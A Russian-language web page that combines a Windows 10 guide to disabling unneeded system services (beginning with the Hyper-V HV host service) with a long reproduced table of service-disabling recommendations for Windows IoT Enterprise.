Служба узла hv что это за служба
Перейти к содержимому

Служба узла hv что это за служба

  • автор:

Отключение служб в Windows 10

В Windows 10 есть много служб, обеспечивающих бесперебойную работу операционной системы. И лучше всего оставить их по умолчанию, но есть некоторые энтузиасты предпочитающие тонкие настройки, которым хочется, чтобы их система работала еще быстрее.

Отключение служб в Windows 10

Если вам интересно, какие службы Windows 10 можно безопасно отключить, то это руководство будет в помощь. Мы настоятельно рекомендуем сначала создать точку восстановления системы, а также записывать все изменения, которые вносятся в конфигурацию служб.

Каждая служба имеет имя, описание, состояние, тип запуска, зависимости и вход в систему с учетной записью. Дважды щелкните любой сервис, чтобы посмотреть его свойства.

  • Тип запуска: для большинства служб установлено значение «Автоматически» или «Автоматически» (отложенный запуск), а для остальных — «Вручную» и «Отключена».
  • Состояние службы: это текущий статус сервиса, который можно быстро изменить с помощью кнопок.
  • Зависимости: многие службы зависят от других. Если это так, вы будете предупреждены, в случае попытки отключения.

Как отключить службы в Windows 10

Многие хотят отключить службы, поскольку они могут помочь ускорить работу компьютера. Лучше всего обратить внимание на сервисы, которые находятся в автоматическом режиме. Именно они, увеличивают время загрузки системы.

Откройте службы через системный поиск.

Как быстро открыть службы в Windows 10

В списке служб щелкните заголовок «Тип запуска«, чтобы отобразить все автоматические службы. Найдите нужную и откройте ее «Свойства«.

Службы Windows 10

Переведите «Тип запуска» в состояние «Отключена» нажмите кнопку «Остановить» и щелкните «OK«.

Как отключить службу в Windows 10

Предостережение

Обычному пользователю нелегко понять, какое влияние будет оказано после отключения службы, и если вы сомневаетесь, выбирайте тип «Вручную» или «Автоматически» (отложенный запуск). Это поможет не навредить системе и быстро загрузить компьютер.

Какие службы Windows 10 можно отключить

Следующие службы Windows могут быть безопасно отключены, если они считаются для вас ненужными.

  • Diagnostic Execution Service — выполняет диагностические действия для поддержки устранения неполадок, если функционал «Диагностики» не используется, отключаем службу.
  • SysMain — поддерживает и улучшает производительность системы. Если система установлена на SSD-накопитель, можно отключить.
  • Windows Search — индексирование поиска, кэширование свойств и результатов поиска для файлов, электронной почты и другого контента.
  • Браузер компьютеров — обслуживает список компьютеров в сети и выдает его программам по запросу.
  • Биометрическая служба Windows — предназначена для сбора, сравнения, обработки и хранения биометрических данных в клиентских приложениях без получения непосредственного доступа к биометрическим образцам или оборудованию.
  • Вторичный вход в систему — позволяет запускать процессы от имени другого пользователя.
  • Диспетчер печати — если вы не используете принтер.
  • Доступ к HID-устройствам — если не используются клавиши быстрого вызова на клавиатурах, пультах дистанционного управления и других устройств мультимедиа.
  • Использование данных — использование данных сети, лимит трафика, ограничение фоновой передачи данных, сети с лимитным тарифным планом.
  • Клиент отслеживания изменившихся связей — поддерживает связи NTFS-файлов, перемещаемых в пределах компьютера или между компьютерами в сети.
  • Модуль поддержки NetBIOS через TCP/IP — для клиентов в сети, позволяя пользователям получать общий доступ к файлам, принтерам, а также подключаться к сети.
  • Общий доступ к подключению к Интернету (ICS) — если таковой не используется.
  • Поддержка элемента панели управления «Отчеты о проблемах и их решениях».
  • Сервер — поддерживает общий доступ к файлам, принтерам и именованным каналам для данного компьютера через сетевое подключение.
  • Сервер кадров камеры Windows — позволяет нескольким клиентам получать доступ к видеокадрам с устройств, оснащенных камерой.
  • Сетевая служба Xbox Live — если не используете Xbox Live, смело отключайте.
  • Служба географического положения — отслеживает местоположение системы и управляет геозонами (географическими расположениями, с которыми сопоставлены события).
  • Служба данных датчиков — получение данных различных датчиков.
  • Служба датчиков — управляет различными функциями сенсоров.
  • Служба наблюдения за датчиками — ведет наблюдение за различными датчиками для предоставления доступа к данным адаптации к системному и пользовательскому состоянию.
  • Служба обмена данными (Hyper-V) — предоставляет механизм обмена данными между виртуальной машиной и операционной системой физического компьютера.
  • Служба поддержки Bluetooth — поддерживает обнаружение и согласование удаленных устройств Bluetooth.
  • Служба политики диагностики — если нет необходимости в обнаружении и устранении неполадок.
  • Служба помощника по совместимости программ — следит за программами, устанавливаемыми и запускаемыми пользователем, и обнаруживает известные проблемы, связанные с совместимостью. Если с этим нет проблем, то отключите.
  • Служба предварительной оценки Windows — предоставляет поддержку инфраструктуры для Программы предварительной оценки Windows.
  • Служба пульса (Hyper-V) — следит за состоянием виртуальной машины и регулярно генерирует пульс. Она помогает выявлять выполняющиеся виртуальные машины, которые перестали отвечать.
  • Служба регистрации ошибок Windows — разрешает отправку отчетов об ошибках в случае прекращения работы или зависания программы, а также разрешает доставку имеющихся решений проблем.
  • Служба синхронизации времени Hyper-V — синхронизирует таймеры этой виртуальной машины и физического компьютера.
  • Служба удаленного управления Windows (WS-Management) — применяет протокол WS-Management для удаленного управления.
  • Служба узла HV — интерфейс для низкоуровневой оболочки Hyper-V, обеспечивающий функционирование счетчиков производительности по разделам для оперативной системы узла.
  • Служба управления радио — управление радио и режима «в самолете».
  • Служба шифрования дисков BitLocker — предоставляет службу шифрования диска.
  • Службы удаленных рабочих столов — разрешает пользователям интерактивное подключение к удаленному компьютеру.
  • Удаленный реестр — позволяет удаленным пользователям изменять параметры реестра на этом компьютере.
  • Узел системы диагностики и Узел службы диагностики — используется службой политики диагностики для размещения средств диагностики, запускаемых в контексте локальной системы.
  • Факс — позволяет отправлять и получать факсы, используя ресурсы этого компьютера и сетевые ресурсы.
  • Функциональные возможности для подключенных пользователей и телеметрия — контролирует процессы сбора и передачи связанных с различными событиями сведений о диагностике и использовании.
  • Служба обновлений? — с ней все сложно, чтобы отключить, придется попотеть, используя сложные методы, но спустя некоторое время она запустится вновь. Воспользовавшись нашей рекомендацией, вы сможете отключить службу обновления и заблокировать повторный её запуск.

Рекомендуемый контент

NetAngels — Облачный хостинг для вашего сайта

Как отключить автоматические обновления Google Chrome

Все веб-браузеры поставляются с поддержкой автоматических обновлений, это касается и Google Chrome. Иногда обновления могут вызывать проблемы, ошибки в работе, несовместимость с некоторыми веб-сайтами, снижение функциональности

Читать подробнее

Защита и безопасность в macOS

Защита и безопасность в macOS управляется системными настройками и позволяет контролировать уровень безопасности учетных записей пользователей на компьютерах и ноутбуках марки Mac. Кроме того, включить или выключить шифрование

Защита и безопасность
Читать подробнее

Точки восстановления Windows 10

Точки восстановления Windows 10, помогут вам отменить нежелательные изменения и восстановить компьютер в состояние, соответствующее ранее созданной точке восстановления.

Windows 10
Читать подробнее

Настройка параметров конфиденциальности в Windows 10

Наверное каждый, при использовании Windows 10 больше всего обеспокоен телеметрией, автоматическим сбором данных и проблемами конфиденциальности.

Защита и безопасность
Читать подробнее

Как ускорить Windows 10

Как ускорить Windows 10, если операционная система снизила свою производительность и стала тормозить? Сделайте ее быстрее, используя самые эффективные методы ускорения компьютера на Windows 10 из нашего подробного руководства.

Руководство по отключению системных служб в Windows IoT Enterprise

Операционная система Windows IoT Enterprise включает множество системных служб, выполняемых в фоновом режиме без пользовательского интерфейса для предоставления основных функций операционной системы. Каждая служба настроена на запуск в определенных обстоятельствах, которые были тщательно выбраны для каждой службы, чтобы обеспечить баланс производительности, функциональности и безопасности для типичного пользователя Windows. К этим типам запуска относятся следующие.

  • Автоматическое запуск при запуске Windows
  • Автоматическое запуск при входе пользователя в систему
  • Запуск вручную при необходимости использования функциональных возможностей
  • Отключено по умолчанию

При создании фиксированной функции специализированное устройство на основе Windows IoT Enterprise может потребоваться перенастроить эти значения запуска, чтобы увеличить уровень безопасности или сократить затраты на ресурсы, отключив службы, которые не нужны для конкретного сценария устройства. В этой статье содержатся подробные рекомендации по безопасному отключению служб, а также ссылки на дополнительные ресурсы , которые предоставляют пошаговые инструкции по настройке для нескольких методов.

Описание рекомендаций

Для всех системных служб, перечисленных в этом документе, корпорация Майкрософт предоставляет рекомендации по включению и отключению системных служб в Windows IoT Enterprise.

  • �� Нет рекомендаций. Эффект отключения этих служб не оценивается полностью. Поэтому конфигурацию этих служб по умолчанию не следует изменять.
  • ⛔ Не отключайте: отключение этой службы влияет на основные функциональные возможности, предотвращая правильное функционирование определенных ролей и функций. Поэтому его нельзя отключить.
  • �� ОК, чтобы отключить: эта служба предоставляет функциональные возможности, которые полезны для некоторых, но не всех предприятий, и ориентированных на безопасность предприятий, которые не используют его, могут безопасно отключить его.
  • ✅ Уже отключена: эта служба отключена по умолчанию; не требуется применять политику.
  • �� Следует отключить: эта служба никогда не должна быть включена в хорошо управляемой корпоративной системе.

На пользовательские службы

При входе пользователя в Windows ОС создает службы для каждого пользователя. При выходе пользователя эти службы остановлены и удалены. Они выполняются в контексте безопасности учетной записи пользователя вместо встроенного субъекта безопасности. Windows создает эти службы на основе шаблонов, определенных в реестре. Если вам нужно управлять поведением этих служб или управлять ими, можно настроить шаблон. Дополнительные сведения об проверке и настройке служб для пользователей см. в разделе «Службы пользователей» в Windows

В следующей таблице перечислены службы на пользователя в текущей версии Windows. Другие версии Windows 10/11 могут не иметь одинаковых служб. Перед перенастройкой любой из этих служб просмотрите эти сведения, чтобы понять последствия. Например, если отключить службу для каждого пользователя, могут быть зависимые приложения, которые не работают правильно.

Имя службы Тип запуска (по умолчанию) Рекомендация Описание
Среда выполнения активации агента (AarSvc) Руководство ⛔ Не отключать Среда выполнения для активации приложений агента беседы.
Служба поддержки пользователей Bluetooth (BluetoothUserService) Руководство �� ОК, чтобы отключить Поддерживает правильную функциональность функций Bluetooth, относящихся к каждому сеансу пользователя.
Служба захвата (CaptureService) Руководство �� ОК, чтобы отключить Включает необязательные функции захвата экрана для приложений, которые вызывают API захвата экрана пространства имен Windows.Graphics.Capture .
Служба пользователей буфера обмена (cbdhsvc) Руководство �� ОК, чтобы отключить Windows использует эту службу пользователей для сценариев буфера обмена. Например, журнал буфера обмена или синхронизация между устройствами. Дополнительные сведения см. в разделе «Буфер обмена» в Windows.
Служба облачного резервного копирования и восстановления (CloudBackupRestoreSvc) Руководство �� Нет рекомендаций Отслеживает систему изменений в состоянии приложения и настройки. При необходимости эта служба выполняет операции облачного резервного копирования и восстановления.
Подключение службы пользователей платформы устройств (CDPUserSvc) Автоматически �� ОК, чтобы отключить Эта служба позволяет пользователю подключать, управлять и управлять подключенными устройствами. К этим подключенным устройствам относятся мобильные устройства, Xbox, HoloLens или smart/IoT. Один из конкретных примеров см. в статье «Совместное использование вещей с близлежащими устройствами в зависимостях Windows «, включая сетевой брокер Подключение ion Broker, удаленный вызов процедур (RPC), драйвер протокола TCP/IP.
ConsentUX (ConsentUxUserSvc) Руководство �� ОК, чтобы отключить Позволяет системе запрашивать согласие пользователя, чтобы разрешить приложениям получать доступ к конфиденциальным ресурсам и сведениям, таким как расположение устройства.
Контактные данные (PimIndexMaintenanceSvc) Руководство �� ОК, чтобы отключить Индексирует данные контактов для их быстрого поиска. Если вы остановите или отключите эту службу, данные контактов могут отсутствовать в результатах поиска. Зависимости включают UnistoreSvc
Диспетчер регистрации учетных данных (CredentialEnrollmentManagerUserSvc) Руководство ⛔ Не отключать Эта служба поддерживает безопасное хранилище и получение учетных данных пользователя. Например, маркеры для веб-сайтов, подключений к удаленному рабочему столу или других приложений.
Брокер ассоциаций устройств (DeviceAssociationBroker) Руководство �� Нет рекомендаций Поддерживает связывание приложений и доступ к проверка для новых сценариев устройств. Зависимости включают DevicePicker, интерфейс связывания оболочки.
DevicePicker (DevicePickerUserSvc ) Руководство �� ОК, чтобы отключить Windows использует эту службу пользователей для управления интерфейсами Miracast, Digital Living Network Alliance (DLNA) и обнаружения и запуска (DIAL).
DeviceFlow (DevicesFlowUserSvc ) Руководство �� ОК, чтобы отключить Позволяет Подключение пользовательскому интерфейсу и Параметры приложению подключаться к устройствам Wi-Fi и Bluetooth.
GameDVR и широковещательная служба пользователей (BcastDVRUserService) Руководство �� ОК, чтобы отключить Windows использует эту службу пользователей для записей игр и трансляций.
Служба обмена сообщениями (MessagingService) Руководство �� ОК, чтобы отключить Эта служба поддерживает текстовые сообщения и связанные функции.
Теперь играет диспетчер сеансов (NPSMSvc) Руководство �� Нет рекомендаций Теперь служба диспетчера сеансов (NPSM) управляет сеансами мультимедиа, выполняемыми на устройстве.
Pen Service (PenService) Руководство �� Нет рекомендаций При нажатии кнопки хвоста на устройстве ввода пера эта служба реагирует на эти действия. Он может запускать приложения или выполнять другие действия, которые вы настраиваете в Параметры. Дополнительные сведения см. в документации пользователей по использованию документации разработчика surface Pen или оборудования на устройствах Pen.
Служба перенаправления плана 9 (P9RdrSvc) Руководство �� Нет рекомендаций Включает файловые серверы с триггером, запускающие план9, поддерживаемые подсистема Windows для Linux. Дополнительные сведения см. в разделе «План 9» из Bell Labs.
Рабочий процесс печати (PrintWorkflowUserSvc) Руководство �� Нет рекомендаций Предоставляет поддержку приложений рабочего процесса печати. Если вы отключите эту службу, некоторые функции печати могут не работать успешно.
Узел синхронизации (OneSyncSvc) Автоматически �� ОК, чтобы отключить Служба синхронизирует почту, контакты, календарь и различные другие пользовательские данные. Почта и другие приложения, зависящие от этой функции, не работают должным образом, если эта служба не запущена.
Udk User Service (UdkUserSvc) Руководство �� ОК, чтобы отключить Windows использует эту службу для координации между интерфейсами оболочки.
Доступ к данным пользователя (UserDataSvc) Руководство �� ОК, чтобы отключить Предоставляет приложениям доступ к структурированным данным пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Служба хранилища пользовательских данных (UnistoreSvc) Руководство �� ОК, чтобы отключить Управляет хранением структурированных данных пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Служба пользователей push-уведомлений Windows (WpnUserService) Руководство ⛔ Не отключать Эта служба размещает платформу push-уведомлений Windows (WNS), которая обеспечивает поддержку локальных и push-уведомлений. Поддерживаются уведомления на плитке, всплывающие и необработанные уведомления.

Системные службы

В следующей таблице перечислены системные службы в текущей версии Windows IoT Enterprise. Другие версии Windows IoT Enterprise могут не иметь одинаковых служб. Перед перенастройкой любой из этих служб просмотрите эти сведения, чтобы понять последствия.

Имя службы Тип запуска (по умолчанию) Рекомендация Описание
Установщик ActiveX (AxInstSV) Руководство �� ОК, чтобы отключить Обеспечивает проверку контроля учетных записей пользователей для установки элементов ActiveX из Интернета и позволяет управлять установкой элемента ActiveX на основе параметров групповой политики. Эта служба запускается по запросу и если установка элементов ActiveX отключена в соответствии с параметрами браузера по умолчанию.
Служба маршрутизатора AllJoyn (AJRouter) Руководство �� ОК, чтобы отключить Выполняет маршрутизацию сообщений AllJoyn для локальных клиентов AllJoyn. Если эта служба остановлена, клиенты AllJoyn, у которых нет собственных упакованных маршрутизаторов, не могут выполняться.
Готовность приложения (AppReadiness) Руководство ⛔ Не отключать Готовит приложения для использования при первом входе пользователя в систему на этом компьютере и при добавлении новых приложений.
Удостоверение приложения (AppIDSvc) Руководство ⛔ Не отключать Определяет и проверяет удостоверение приложения. Отключение этой службы предотвращает принудительное применение AppLocker.
Сведения о приложении (Appinfo) Руководство ⛔ Не отключать Упрощает выполнение интерактивных приложений с дополнительными правами администратора. Если эта служба остановлена, пользователи не могут запускать приложения с дополнительными правами администратора, которые им требуются для выполнения требуемых задач пользователей.
Служба шлюза уровня приложений (ALG) Руководство �� ОК, чтобы отключить Предоставляет поддержку подключаемых модулей протокола для общего доступа к Интернету Подключение ion
Управление приложениями (AppMgmt) Руководство �� ОК, чтобы отключить Обрабатывает запросы на установку, удаление и перечисление программного обеспечения, развернутого с помощью групповой политики. Если служба отключена, пользователи не могут устанавливать, удалять или перечислять программное обеспечение, развернутые с помощью групповой политики. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба развертывания AppX (AppXSVC) Руководство �� ОК, чтобы отключить Обеспечивает поддержку инфраструктуры для развертывания приложений Store. Эта служба запускается по запросу и если отключенные приложения Store не могут быть развернуты в системе и не работают должным образом.
Служба AssignedAccessManager (AssignedAccessManagerSvc) Руководство ⛔ Не отключать Служба AssignedAccessManager поддерживает возможности киоска в Windows.
Автоматическое обновление часового пояса (tzautoupdate) Выключено ✅ Уже отключен Автоматически устанавливает часовой пояс системы.
Служба AVCTP (BthAvctpSvc) Руководство �� ОК, чтобы отключить Это служба транспортных протоколов управления аудиотрансляции.
Фоновая интеллектуальная служба передачи (BITS) Руководство �� ОК, чтобы отключить Передает файлы в фоновом режиме, используя незанятую пропускную способность сети. Если служба отключена, все приложения, зависящие от BITS, такие как Обновл. Windows или MSN Обозреватель, не могут автоматически скачивать программы и другие сведения.
Служба инфраструктуры фоновых задач (BrokerInfrastructure) Автоматически ⛔ Не отключать Служба инфраструктуры Windows, управляющая фоновыми задачами, которые могут выполняться в системе.
Базовый модуль фильтрации (BFE) Автоматически ⛔ Не отключать Базовый модуль фильтрации (BFE) — это служба, которая управляет политиками брандмауэра и IPsec и осуществляет фильтрацию в пользовательском режиме. Остановка или отключение службы BFE снижает безопасность системы, что приводит к непредсказуемому поведению в приложениях управления IPsec и брандмауэра.
Служба шифрования дисков BitLocker (BDESVC) Руководство ⛔ Не отключать BDESVC размещает службу шифрования дисков BitLocker. Шифрование диска BitLocker обеспечивает безопасный запуск операционной системы и полное шифрование томов для ОС, фиксированных или съемных томов. Эта служба позволяет BitLocker запрашивать пользователям различные действия, связанные с их томами при подключении, и автоматически разблокировать тома без взаимодействия с пользователем. Кроме того, он сохраняет сведения о восстановлении в Active Directory, если он доступен, и при необходимости гарантирует использование последних сертификатов восстановления. Остановка или отключение службы не позволит пользователям использовать эту функцию.
Служба подсистемы резервного копирования уровня блоков (wbengine) Руководство �� Нет рекомендаций Служба WBENGINE используется программа архивации данных для выполнения операций резервного копирования и восстановления. Если эта служба отключена, она может вызвать сбой текущей операции резервного копирования или восстановления. Отключение этой службы предотвращает операции резервного копирования и восстановления с помощью программа архивации данных на этом компьютере.
Служба аудио шлюза Bluetooth (BTAGService) Руководство �� ОК, чтобы отключить Служба, поддерживающая роль звукового шлюза профиля Bluetooth Handsfree.
Служба поддержки Bluetooth (bthserv) Руководство �� ОК, чтобы отключить Служба Bluetooth поддерживает обнаружение и сопоставление удаленных устройств Bluetooth. Остановка или отключение этой службы не позволяют устройствам Bluetooth работать должным образом и предотвращать обнаружение или связывание новых устройств.
BranchCache (PeerDistSvc) Руководство �� ОК, чтобы отключить Эта служба кэширует сетевое содержимое из одноранговых узлов в локальной подсети.
Служба Access Manager (camsvc) Руководство �� ОК, чтобы отключить Служба Access Manager поддерживает управление доступом приложений UWP к возможностям приложений и проверка доступ приложения к определенным возможностям приложения.
Время сотовой связи (autotimesvc) Руководство �� ОК, чтобы отключить Эта служба задает время на основе сообщений NITZ из мобильной сети.
Распространение сертификатов (CertPropSvc) Руководство ⛔ Не отключать Служба распространения сертификатов копирует пользовательские и корневые сертификаты из смарт-карта в хранилище сертификатов текущего пользователя, обнаруживает, когда смарт-карта вставляется в смарт-средство чтения карта и устанавливает смарт-карта самонастраивающийся мини-driver. Перенастройка CertPropSvc не рекомендуется.
Служба клиентской лицензии (ClipSVC) Руководство �� ОК, чтобы отключить Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по запросу и если отключенные приложения, приобретенные с помощью Microsoft Store, не работают правильно.
Изоляция ключей CNG (KeyIso) Руководство ⛔ Не отключать Служба изоляции ключей CNG размещается в процессе LSA. Она обеспечивает изоляцию процессов с закрытыми ключами и связанных с ними криптографических операций в соответствии с общими критериями. Служба хранит и использует долгоживущие ключи в безопасном процессе в соответствии с требованиями общих критериев.
Com+ Event System (EventSystem) Автоматически ⛔ Не отключать Поддерживает службу уведомлений о системных событиях (SENS), которая обеспечивает автоматическое распространение событий подписавшимся компонентам Component Object Model (COM). Если служба остановлена, SENS закрывается и не может предоставлять уведомления о входе и выходе. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Приложение COM+ System ( COMSysApp) Руководство ⛔ Не отключать Управляет настройкой и отслеживанием компонентов на основе модели COM+. Если служба остановлена, большинство компонентов на основе COM+не работают должным образом. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
служба платформы устройств Подключение (CDPSvc) Автоматически �� ОК, чтобы отключить Эта служба используется для Подключение устройств и универсальных стеклянных сценариев.
Подключение взаимодействия с пользователем и телеметрией (DiagTrack) Автоматически �� ОК, чтобы отключить DiagTrack включает функции, поддерживающие взаимодействие с приложением и подключенными пользователями, а также управление коллекцией на основе событий и передачей диагностических сведений и сведений об использовании, которые используются для улучшения взаимодействия и качества платформы Windows, когда параметры диагностика и конфиденциальности использования включены в разделе «Отзывы и диагностика».
CoreMessaging (CoreMessagingRegistrar) Автоматически ⛔ Не отключать Управляет взаимодействием между компонентами системы.
Credential Manager (VaultSvc) Руководство ⛔ Не отключать Обеспечивает безопасное хранение и получение учетных данных для пользователей, приложений и пакетов служб безопасности.
Службы шифрования (CryptSvc ) Автоматически ⛔ Не отключать Cryptograpic Services поддерживает подтверждение подписей файлов и позволяет устанавливать новые программы, управлять сертификатами доверенного корневого центра сертификации с этого компьютера, извлекать корневые сертификаты из Обновл. Windows и включать такие сценарии, как SSL. Не рекомендуется перенастроить службу CryptSvc. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба общего доступа к данным (DsSvc) Руководство ⛔ Не отключать Выполняет функции посредника при передаче данных между приложениями.
Использование данных (DusmSvc) Автоматически ⛔ Не отключать Использование данных сети, ограничение данных, ограничение фоновой передачи данных в сетях с лимитным тарифным планом.
Средство запуска процессов сервера DCOM (DcomLaunch) Автоматически ⛔ Не отключать Служба DCOMLAUNCH запускает серверы COM и DCOM в ответ на запросы на активацию объектов. Перенастройка службы DcomLaunch предотвращает правильную функциональность программ с помощью COM или DCOM. Не рекомендуется перенастроить службу DcomLaunch.
Оптимизация доставки (DoSvc) Автоматически ⛔ Не отключать Выполняет задачи оптимизации доставки содержимого.
Служба ассоциаций устройств (DeviceAssociationService) Руководство �� ОК, чтобы отключить Обеспечивает связывание между системой и проводными или беспроводными устройствами.
Служба установки устройств (DeviceInstall) Руководство ⛔ Не отключать Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приводит к нестабильности системы.
Служба регистрации Управление устройствами (DmEnrollmentSvc) Руководство �� Нет рекомендаций Управление устройствами служба регистрации выполняет действия регистрации устройств для управления устройствами.
служба маршрутизации push-сообщений протокола беспроводного приложения Управление устройствами (dmwappushservice) Руководство �� Нет рекомендаций Эта служба обеспечивает маршрутизацию push-сообщений беспроводного приложения.
Диспетчер установки устройств (DsmSvc) Руководство ⛔ Не отключать Обеспечивает обнаружение, скачивание и установку программного обеспечения, относящегося к устройствам. Перенастройка DsmSvc приводит к тому, что устройства используют устаревшее программное обеспечение и не рекомендуется.
Брокер обнаружения фоновых данных DevQuery (DevQueryBroker) Руководство ⛔ Не отключать Позволяет приложениям обнаруживать устройства с фоновой задачей.
DHCP-клиент (DHCP) Автоматически ⛔ Не отключать Регистрирует и обновляет IP-адреса и DNS-записи для этого компьютера. Перенастройка службы DHCP предотвращает получение динамических IP-адресов и обновлений DNS и не рекомендуется. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба выполнения диагностики (diagsvc) Руководство ⛔ Не отключать Выполняет диагностические действия для устранения неполадок.
Служба диагностики политик (DPS) Автоматически ⛔ Не отключать Служба политики диагностики позволяет обнаруживать проблемы с компонентами Windows, выполнять их диагностику и устранять их. Если эта служба остановлена, диагностика не действовать.
Узел системы диагностики (WdiSystemHost) Руководство ⛔ Не отключать Узел системы диагностики используется службой политики диагностики для размещения диагностики, которая должна выполняться в контексте локального компьютера. Перенастройка службы WdiSystemHost приводит к диагностика, которые зависят от нее, и не рекомендуется.
Служба блокировки диалогов (DialogBlockingService) Выключено ✅ Уже отключен Служба блокировки диалогов
Служба улучшения отображения (DisplayEnhancementService) Руководство ⛔ Не отключать Служба для управления улучшениями отображения, такими как элемент управления яркостью.
Служба политики отображения (DispBrokerDesktopSvc) Автоматически ⛔ Не отключать Управляет подключением и настройкой локальных и удаленных дисплеев.
Клиент отслеживания распределенных ссылок (TrkWks) Автоматически �� ОК, чтобы отключить Поддерживает связи между файлами NTFS внутри компьютера или между компьютерами в сети.
Координатор распределенных транзакций (MSDTC) Автоматически �� ОК, чтобы отключить Координирует транзакции, охватывающие несколько диспетчеров ресурсов, таких как базы данных, очереди сообщений и файловые системы. Если эта служба остановлена, эти транзакции завершаются ошибкой. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
DNS-клиент (Dnscache) Автоматически ⛔ Не отключать Служба DNS-клиента (dnscache) кэширует имена доменных имен (DNS) и регистрирует полное имя компьютера для этого компьютера. Если служба остановлена, dns-имена продолжают разрешаться. Однако результаты запросов DNS-имен не кэшируются, а имя компьютера не зарегистрировано. Если служба отключена, все службы, которые явно зависят от нее, не запускаются.
Скачанный диспетчер Карты (Карты Broker) Автоматически �� ОК, чтобы отключить Служба Windows для доступа приложений к скачанным картам. Эта служба запускается по требованию, когда приложение обращается к скачанным картам. Отключение этой службы запрещает приложениям получать доступ к картам.
Внедренный режим (embeddedmode) Руководство ⛔ Не отключать Служба «Встроенный режим» позволяет выполнять сценарии, относящиеся к фоновым приложениям. Отключение этой службы предотвращает активацию фоновых приложений.
Шифрование файловой системы (EFS) Руководство ⛔ Не отключать Предоставляет основную технологию шифрования файлов, которая используется для хранения зашифрованных файлов в томах файловой системы NTFS. Если эта служба остановлена или отключена, приложения не могут получить доступ к зашифрованным файлам.
Корпоративная служба управления приложениями (EntAppSvc) Руководство �� ОК, чтобы отключить Позволяет управлять корпоративными приложениями.
Расширяемый протокол проверки подлинности (EapHost) Руководство �� ОК, чтобы отключить Служба расширяемого протокола проверки подлинности (EAP) обеспечивает проверку подлинности в сети в таких сценариях, как 802.1x (проводные и беспроводные сети), VPN и защита доступа к сети (NAP). EAP также обеспечивает поддержку программных интерфейсов (API), используемых клиентами доступа к сети, такими как беспроводной клиент и VPN-клиент, в процессе проверки подлинности. Если эта служба отключена, компьютеру не удастся получить доступ к сетям, требующим проверку подлинности EAP.
Факс (факс) Руководство �� ОК, чтобы отключить
Служба журнала файлов (fhsvc) Руководство ⛔ Не отключать Защищает файлы пользователей от случайной потери путем копирования их в расположение резервной копии.
Узел поставщика обнаружения функций (fdPHost) Руководство �� ОК, чтобы отключить В службе FDPHOST размещаются поставщики обнаружения сетевых ресурсов компонента обнаружения функций. Эти поставщики обнаружения функций обеспечивают службы обнаружения сетевых ресурсов для протоколов SSDP и WS-D. Остановка или отключение службы FDPHOST отключает обнаружение сети для этих протоколов при использовании FD. Если эта служба недоступна, сетевые службы с помощью FD и используют эти протоколы обнаружения, не могут находить сетевые устройства или ресурсы.
Публикация ресурсов обнаружения функций (FDResPub) Руководство �� ОК, чтобы отключить Публикует этот компьютер и подключенные к нему ресурсы, чтобы их можно было обнаружить по сети. Перенастройка службы FDResPub предотвращает обнаружение другими компьютерами в сети.
Служба геолокации (lfsvc) Руководство �� ОК, чтобы отключить Эта служба отслеживает текущее расположение системы и управляет геозонами (географическое местоположение со связанными событиями). Если вы отключите эту службу, приложения не могут использовать или получать уведомления о геолокации или геозонах.
GraphicsPerfSvc (GraphicsPerfSvc) Руководство ⛔ Не отключать Служба монитора производительности графики.
Клиент групповой политики (gpsvc) Автоматически ⛔ Не отключать Эта служба отвечает за применение параметров, настроенных администраторами для компьютера и пользователей, посредством компонента групповой политики. Перенастройка клиентских служб групповой политики предотвращает управление с помощью групповой политики. Все компоненты или приложения, зависящие от компонента групповой политики, не работают, если служба отключена.
Служба устройств пользовательского интерфейса (hidserv) Руководство ⛔ Не отключать Активирует клавиши быстрого вызова на клавиатурах, пультах дистанционного управления и других мультимедийных устройствах, а также поддерживает их использование. Перенастройка службы HidServ не рекомендуется.
Служба узла HV (HvHost) Руководство �� ОК, чтобы отключить Предоставляет интерфейс для низкоуровневой оболочки Hyper-V, обеспечивающий функционирование счетчиков производительности по разделам для оперативной системы узла.
Служба обмена данными Hyper-V (vmickvpexchange) Руководство �� ОК, чтобы отключить Служба предоставляет механизм обмена данными между виртуальной машиной и операционной системой физического компьютера.
Интерфейс гостевой службы Hyper-V (vmicguestinterface) Руководство �� ОК, чтобы отключить Предоставляет интерфейс для взаимодействия узла Hyper-V с определенными службами, которые выполняются на виртуальной машине.
Гостевая служба завершения работы Hyper-V (vmicshutdown) Руководство �� ОК, чтобы отключить Предоставляет механизм для завершения работы операционной системы этой виртуальной машины из интерфейсов управления на физическом компьютере.
Служба пульса Hyper-V (vmicheartbeat) Руководство �� ОК, чтобы отключить Отслеживает состояние этой виртуальной машины, регулярно сообщая о пульсе. Эта служба помогает определить запущенные виртуальные машины, которые перестают отвечать на запросы.
Прямая служба PowerShell Hyper-V (vmicvmsession) Руководство �� ОК, чтобы отключить Обеспечивает механизм управления виртуальной машиной через PowerShell с помощью сеанса виртуальной машины без виртуальной сети.
Служба виртуализации удаленных рабочих столов Hyper-V (vmicrdv) Руководство �� ОК, чтобы отключить Служба предоставляет платформу для обмена данными между виртуальной машиной и операционной системой физического компьютера.
Служба синхронизации времени Hyper-V (vmictimesync) Руководство �� ОК, чтобы отключить Синхронизирует системное время виртуальной машины с системным временем физического компьютера.
Запрос на теневую копию тома Hyper-V (vmicvss) Руководство �� ОК, чтобы отключить Служба запросов теневого копирования томов Hyper-V координирует обмен данными, необходимыми службой теневого копирования томов для резервного копирования приложений и данных на этой виртуальной машине из операционной системы на физическом компьютере.
Модули ключей IKE и AuthIP IPsec (IKEEXT) Руководство ⛔ Не отключать Служба IKEEXT содержит модули для работы с ключами по протоколу IKE и AuthIP. Эти модули для работы с ключами используются при проверке подлинности и обмене ключами в протоколе безопасности IP (IPsec). Остановка или отключение службы IKEEXT предотвращает обмен ключами IKE и AuthIP с одноранговыми компьютерами. Перенастройка службы IKEEXT компрометирует безопасность из-за сбоев IPSec и не рекомендуется.
